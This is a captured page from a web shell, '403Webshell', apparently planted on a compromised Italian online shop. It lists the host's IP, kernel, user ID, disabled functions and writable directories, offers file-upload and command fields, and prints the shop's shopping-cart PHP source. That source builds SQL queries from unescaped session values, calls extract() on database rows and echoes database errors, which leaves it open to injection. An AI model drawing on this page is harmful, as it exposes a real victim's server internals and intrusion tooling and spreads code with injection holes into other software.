403Webshell
Server IP : 89.46.109.6  /  Your IP : 216.73.217.116
Web Server : Apache
System : Linux hlpi1ws-c284s07.ad.aruba.it 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
User : ID19067310 ( 19067310)
PHP Version : 5.3.29
Disable Function : system,popen,dl,passthru,proc_open,shell_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /web/htdocs/www.edizacco.it/home/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /web/htdocs/www.edizacco.it/home/include/carrello.php
<?php
/////////////////////////////////////////////////////////////////////////////////
//// MOSTRA CARRELLO ////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
function mostraCarrello(){
	$prefix = PREFIX;
  global $db;
  $carrello = $_SESSION['carrello'];
  $somma = 0;
  $peso = 0;
	// DATI PER LA SPEDIZIONE /////////////////////////////////////
	$peso_a = '3.00'; $spedizione_a = '5.10';			// DA 0Kg		A	3Kg 	= 5.10
	$peso_b = '5.00'; $spedizione_b = '6.30';	 		// DA 3Kg		A 5Kg 	= 6.30
	$peso_c = '10.00'; $spedizione_c = '8.60';	 	// DA 5Kg		A 10Kg 	= 8.60
	$peso_d = '20.00'; $spedizione_d = '11.20';		// DA 10Kg	A 20Kg 	= 11.20
	$peso_e = '30.00'; $spedizione_e = '13.40';		// DA 20Kg	A 30Kg	= 13.40
	$peso_f = '50.00'; $spedizione_f = '24.30';		// DA 30Kg	A 50Kg	= 24.30
	$peso_g = '100.00'; $spedizione_g = '43.60';	// DA 50Kg	A 100Kg	= 43.60
	$spedizione_oltre = '60.50';									// DA 100Kg	in poi	= 60.50
	$spedizione_gratuita = 'Gratuita'; // SPEDIZIONE GRATUITA
	// DATI PER LA SPEDIZIONE /////////////////////////////////////

  if ($carrello){
    $prodotti = @explode(',',$carrello);
    $acquisti = array();
    foreach ($prodotti as $prodotto) {
      $acquisti[$prodotto] = (@isset($acquisti[$prodotto])) ? $acquisti[$prodotto] + 1 : 1;
    }
    foreach ($acquisti as $id_prodotto_scheda=>$quantita){
			$sql = 'SELECT * FROM '.$prefix.'_prodotti_scheda WHERE id_prodotto_scheda = '.$id_prodotto_scheda;
	  	$res = $db->query($sql);
      $f = $res->fetch();
      @extract($f);
      $somma += $prezzo * $quantita;
			$peso_totale += $peso * $quantita;
	}
 
		if ( $_SESSION['sess_controllo_citta'] == 'palermo' ) {
			$spedizione = $spedizione_gratuita;
		} elseif ($peso_totale <= $peso_a) {
			$spedizione = number_format($spedizione_a,2).' &euro;';
		} elseif ($peso_totale <= $peso_b) {
			$spedizione = number_format($spedizione_b,2).' &euro;';
		} elseif ($peso_totale <= $peso_c) {
			$spedizione = number_format($spedizione_c,2).' &euro;';
		} elseif ($peso_totale <= $peso_d) {
			$spedizione = number_format($spedizione_d,2).' &euro;';
		} elseif ($peso_totale <= $peso_e) {
			$spedizione = number_format($spedizione_e,2).' &euro;';
		} elseif ($peso_totale <= $peso_f) {
			$spedizione = number_format($spedizione_f,2).' &euro;';
		} elseif ($peso_totale <= $peso_g) {
			$spedizione = number_format($spedizione_g,2).' &euro;';
		} else {
			$spedizione = number_format($spedizione_oltre,2).' &euro;';
		} 
 
    $result[] = '
				<p class="prodotto">Prodotti: <b>'.@count($prodotti).'</b></p>
				<p class="spedizione">Spedizione: <b>'.$spedizione.'</b></p>
				<p class="totale">Totale: <b>'.number_format($somma + $spedizione,2).' &euro;</b></p>
				<p><a href="faq.php" class="btn left">Info</a><a href="carrello.php" class="btn right">Vai alla cassa</a></p>
				
		';
	}else{
    $result[] = '
				<p class="prodotto">Prodotti: <b>0</b></p>
				<p class="spedizione">Spedizione: <b>0 &euro;</b></p>
				<p class="totale">Totale: <b>0 &euro;</b></p>
				<p><a href="faq.php" class="btn left">Info</a><a href="carrello.php" class="btn right">Vai alla cassa</a></p>
		';
  }
  return @join('',$result);
}



/////////////////////////////////////////////////////////////////////////////////
//// PAGINA CARRELLO ////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
function mostraCarrelloPagina(){
	$prefix = PREFIX;
	$directory = PRODOTTIDIRECTORY;
	$colore[]= 'style="background-color:#DDD;"';
	$colore[]= 'style="background-color:#EEE;"';
	$indice_colore=0;
  global $db;
  $carrello = $_SESSION['carrello'];
  $somma = 0;
  $peso = 0;
	
	// DATI PER LA SPEDIZIONE /////////////////////////////////////
	$peso_a = '3.00'; $spedizione_a = '5.10';			// DA 0Kg		A	3Kg 	= 5.10
	$peso_b = '5.00'; $spedizione_b = '6.30';	 		// DA 3Kg		A 5Kg 	= 6.30
	$peso_c = '10.00'; $spedizione_c = '8.60';	 	// DA 5Kg		A 10Kg 	= 8.60
	$peso_d = '20.00'; $spedizione_d = '11.20';		// DA 10Kg	A 20Kg 	= 11.20
	$peso_e = '30.00'; $spedizione_e = '13.40';		// DA 20Kg	A 30Kg	= 13.40
	$peso_f = '50.00'; $spedizione_f = '24.30';		// DA 30Kg	A 50Kg	= 24.30
	$peso_g = '100.00'; $spedizione_g = '43.60';	// DA 50Kg	A 100Kg	= 43.60
	$spedizione_oltre = '60.50';									// DA 100Kg	in poi	= 60.50
	$spedizione_gratuita = 'Gratuita'; // SPEDIZIONE GRATUITA
	// DATI PER LA SPEDIZIONE /////////////////////////////////////

 	if ($carrello) {
    $prodotti = @explode(',',$carrello);
    $acquisti = array();
    foreach ($prodotti as $prodotto){
      $acquisti[$prodotto] = (@isset($acquisti[$prodotto])) ? $acquisti[$prodotto] + 1 : 1;
    }
    $result[] = '<form action="carrello.php?action=aggiorna" method="post" id="modulo_carrello">';
    $result[] = '<ul class="carrello">';

    foreach ($acquisti as $id_prodotto_scheda=>$quantita) {
		$sql = 'SELECT * FROM '.$prefix.'_prodotti_scheda WHERE id_prodotto_scheda = '.$id_prodotto_scheda;
	
		echo mysql_error();
	
    $res = $db->query($sql);
    $f = $res->fetch();
    @extract($f);
		
		$carica_immagine = mysql_fetch_assoc(mysql_query("SELECT * FROM ".$prefix."_prodotti_img WHERE id_prodotto = '$id_prodotto' ORDER BY id_prodotto_img ASC LIMIT 1"));
		if( $carica_immagine['immagine'] != "" ){ $tag_img = '../'.$directory.'/'.$carica_immagine['immagine']; }else{ $tag_img = 'images/nd.jpg'; }
		
			$result[] = '
				<li '.$colore[$indice_colore].'>
					<div class="img"><img src="'. $tag_img.'" alt="" class="ic_images" /></div>
					<div class="titolo">
						<p class="h1"><a href="prodotti_scheda.php?id_prodotto='.$id_prodotto.'">'.$titolo_it.'</a></p>
						<p><i>Cod: '.$codice.'</i></p>
					</div>
					<div class="prezzo">
						<p class="pi">Prezzo singolo</p>
						<p class="p">'.number_format($prezzo,2).' &euro;</p>
						<p class="qi">Q.t&Agrave; ( Kg / Cadauno )</p>
						<p class="q"><input type="text" name="quantita'.$id_prodotto_scheda.'" value="'.$quantita.'" id="input_quantita"></p>
						<p class="pi">Prezzo Totale</p>
						<p class="p">'.number_format($prezzo * $quantita,2).' &euro;</p>
					</div>
					<div class="delete"><a href="carrello.php?action=cancella&id_prodotto_scheda='.$id_prodotto_scheda.'"><img src="images/carrello/cart_delete.png" alt="" class="ic_delete" /></a></div>
				</li>
			';
			$indice_colore=1-$indice_colore;
			$somma += $prezzo * $quantita;
			$peso_totale += $peso * $quantita;
		}
		
		if ( $_SESSION['sess_controllo_citta'] == 'palermo' ) {
			$spedizione = $spedizione_gratuita;
		} elseif ($peso_totale <= $peso_a) {
			$spedizione = number_format($spedizione_a,2).' &euro;';
		} elseif ($peso_totale <= $peso_b) {
			$spedizione = number_format($spedizione_b,2).' &euro;';
		} elseif ($peso_totale <= $peso_c) {
			$spedizione = number_format($spedizione_c,2).' &euro;';
		} elseif ($peso_totale <= $peso_d) {
			$spedizione = number_format($spedizione_d,2).' &euro;';
		} elseif ($peso_totale <= $peso_e) {
			$spedizione = number_format($spedizione_e,2).' &euro;';
		} elseif ($peso_totale <= $peso_f) {
			$spedizione = number_format($spedizione_f,2).' &euro;';
		} elseif ($peso_totale <= $peso_g) {
			$spedizione = number_format($spedizione_g,2).' &euro;';
		} else {
			$spedizione = number_format($spedizione_oltre,2).' &euro;';
		} 
		
		$result[] = '
			<li class="totale"><span style="color:#000000;">Totale Prodotti:</span> '.number_format($somma,2).' &euro;</li>
			<li class="totale"><span style="color:#000000;">Spese di Spedizioni:</span> '.$spedizione.'</li>
			<li class="totale_finale">Totale Finale: '.number_format($somma + $spedizione,2).'</li>
			<li class="completa"><a href="ordine.php"><img src="images/carrello/cart_completa.png" alt="Completa Ordine" class="ordine" /></a></li>
			<li class="refresh"><input type="image" name="refresh" class="refresh" src="images/carrello/cart_aggiorna.png"  /></li>
		';
		$result[] = '</ul>';
		$result[] = '</form>';
  }else{
    $result[] = '<p>Il tuo carrello è vuoto</p>';
  }
  return @join('',$result);
}



/////////////////////////////////////////////////////////////////////////////////
//// PAGINA CARRELLO RIEPILOGO //////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
function mostraCarrelloRiepilogo(){
	$prefix = PREFIX;
	$directory = PRODOTTIDIRECTORY;
	$colore[]= 'style="background-color:#DDD;"';
	$colore[]= 'style="background-color:#EEE;"';
	$indice_colore=0;
  global $db;
  $carrello = $_SESSION['carrello'];
  $somma = 0;
  $peso = 0;

	// DATI PER LA SPEDIZIONE /////////////////////////////////////
	$peso_a = '3.00'; $spedizione_a = '5.10';			// DA 0Kg		A	3Kg 	= 5.10
	$peso_b = '5.00'; $spedizione_b = '6.30';	 		// DA 3Kg		A 5Kg 	= 6.30
	$peso_c = '10.00'; $spedizione_c = '8.60';	 	// DA 5Kg		A 10Kg 	= 8.60
	$peso_d = '20.00'; $spedizione_d = '11.20';		// DA 10Kg	A 20Kg 	= 11.20
	$peso_e = '30.00'; $spedizione_e = '13.40';		// DA 20Kg	A 30Kg	= 13.40
	$peso_f = '50.00'; $spedizione_f = '24.30';		// DA 30Kg	A 50Kg	= 24.30
	$peso_g = '100.00'; $spedizione_g = '43.60';	// DA 50Kg	A 100Kg	= 43.60
	$spedizione_oltre = '60.50';									// DA 100Kg	in poi	= 60.50
	$spedizione_gratuita = 'Gratuita'; 						// SPEDIZIONE GRATUITA
	// DATI PER LA SPEDIZIONE /////////////////////////////////////

	// DATI COMMISSIONI ///////////////////////////////////////////
	$percentuale_paypal = '3.4';
	$addizionale_paypal = '0.35';
	$percentuale_contrassegno = '3';
	// DATI COMMISSIONI ///////////////////////////////////////////

 	if ($carrello) {
    $prodotti = @explode(',',$carrello);
    $acquisti = array();
    foreach ($prodotti as $prodotto){
      $acquisti[$prodotto] = (@isset($acquisti[$prodotto])) ? $acquisti[$prodotto] + 1 : 1;
    }
    $result[] = '<ul class="carrello">';

    foreach ($acquisti as $id_prodotto_scheda=>$quantita) {
		$sql = 'SELECT * FROM '.$prefix.'_prodotti_scheda WHERE id_prodotto_scheda = '.$id_prodotto_scheda;
	
		echo mysql_error();
	
    $ids[]="$id_prodotto_scheda";
		$res = $db->query($sql);
    $f = $res->fetch();
    @extract($f);
		
		$carica_immagine = mysql_fetch_assoc(mysql_query("SELECT * FROM ".$prefix."_prodotti_img WHERE id_prodotto = '$id_prodotto' ORDER BY id_prodotto_img ASC LIMIT 1"));
		if( $carica_immagine['immagine'] != "" ){ $tag_img = '../'.$directory.'/'.$carica_immagine['immagine']; }else{ $tag_img = 'images/nd.jpg'; }
		
			$result[] = '
				<li '.$colore[$indice_colore].'>
					<div class="img"><img src="'. $tag_img.'" alt="" class="ic_images" /></div>
					<div class="titolo">
						<p class="h1"><a href="prodotti_scheda.php?id_prodotto='.$id_prodotto.'">'.$titolo_it.'</a></p>
						<p><i>Cod: '.$codice.'</i></p>
					</div>
					<div class="prezzo">
						<p class="pi">Prezzo singolo</p>
						<p class="p">'.number_format($prezzo,2).' &euro;</p>
						<p class="qi">Q.t&Agrave;</p>
						<p class="qtext">'.$quantita.'</p>
						<p class="pi">Prezzo Totale</p>
						<p class="p">'.number_format($prezzo * $quantita,2).' &euro;</p>
					</div>
				</li>
			';
			$indice_colore=1-$indice_colore;
			$somma += $prezzo * $quantita;
			$peso_totale += $peso * $quantita;
		}
		
		if ( $_SESSION['sess_controllo_citta'] == 'palermo' ) {
			$spedizione = $spedizione_gratuita;
		} elseif ($peso_totale <= $peso_a) {
			$spedizione = number_format($spedizione_a,2) .' &euro;';
		} elseif ($peso_totale <= $peso_b) {
			$spedizione = number_format($spedizione_b,2) .' &euro;';
		} elseif ($peso_totale <= $peso_c) {
			$spedizione = number_format($spedizione_c,2) .' &euro;';
		} elseif ($peso_totale <= $peso_d) {
			$spedizione = number_format($spedizione_d,2) .' &euro;';
		} elseif ($peso_totale <= $peso_e) {
			$spedizione = number_format($spedizione_e,2) .' &euro;';
		} elseif ($peso_totale <= $peso_f) {
			$spedizione = number_format($spedizione_f,2) .' &euro;';
		} elseif ($peso_totale <= $peso_g) {
			$spedizione = number_format($spedizione_g,2) .' &euro;';
		} else {
			$spedizione = number_format($spedizione_oltre,2) .' &euro;';
		} 

		$result[] = '
			<li class="totale"><span style="color:#000000;">Totale Prodotti:</span> '.number_format($somma,2).' &euro;</li>
			<li class="totale"><span style="color:#000000;">Spese di Spedizioni:</span> '.$spedizione.'</li>
		';
		$value_totale = $somma + $spedizione;
		$metodo_pagamento = $_SESSION['sess_metodo_pagamento'];
		if( $metodo_pagamento == "paypal" ){
			$paypal_percentuale = $value_totale + ( $value_totale /100 * $percentuale_paypal );
			$value_totale_paypal = $paypal_percentuale + $addizionale_paypal;
			$commissione_paypal =  $value_totale_paypal - $value_totale;
			$commissione = $commissione_paypal;
			$totale_finale = number_format($somma + $spedizione + $commissione_paypal,2);
			
			$result[] = '
				<li class="totale"><span style="color:#000000;">Commissione Paypal:</span> '.number_format($commissione_paypal,2).' &euro;</li>
				<li class="totale_finale">Totale Finale: '.$totale_finale.' &euro;</li>
			';
		}elseif( $metodo_pagamento == "contrassegno" ){
			$contrassegno_percentuale = $value_totale + ( $value_totale /100 * $percentuale_contrassegno );
			$commissione_contrassegno =  $contrassegno_percentuale - $value_totale;
			$commissione = $commissione_contrassegno;
			$totale_finale = number_format($somma + $spedizione + $commissione_contrassegno,2);
			$result[] = '
				<li class="totale"><span style="color:#000000;">Commissione Contrassegno:</span> '.number_format($commissione_contrassegno,2).' &euro;</li>
				<li class="totale_finale">Totale Finale: '.$totale_finale.' &euro;</li>
			';
		}else{
			$totale_finale = number_format($somma + $spedizione,2);
			$commissione = '0';
			$result[] = '<li class="totale_finale">Totale Finale: '.$totale_finale.' &euro;</li>';
		}
		
		$result[] = '</ul>';
		$result[] = '
				<input type="hidden" name="salva_somma" value="'.$somma.'"/>
				<input type="hidden" name="salva_spedizione" value="'.$spedizione.'"/>
				<input type="hidden" name="salva_commissione" value="'.$commissione.'"/>
				<input type="hidden" name="salva_totale" value="'.$totale_finale.'"/>
		';
  }else{
    $result[] = '<p>Il tuo carrello è vuoto</p>';
  }
  return @join('',$result);
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit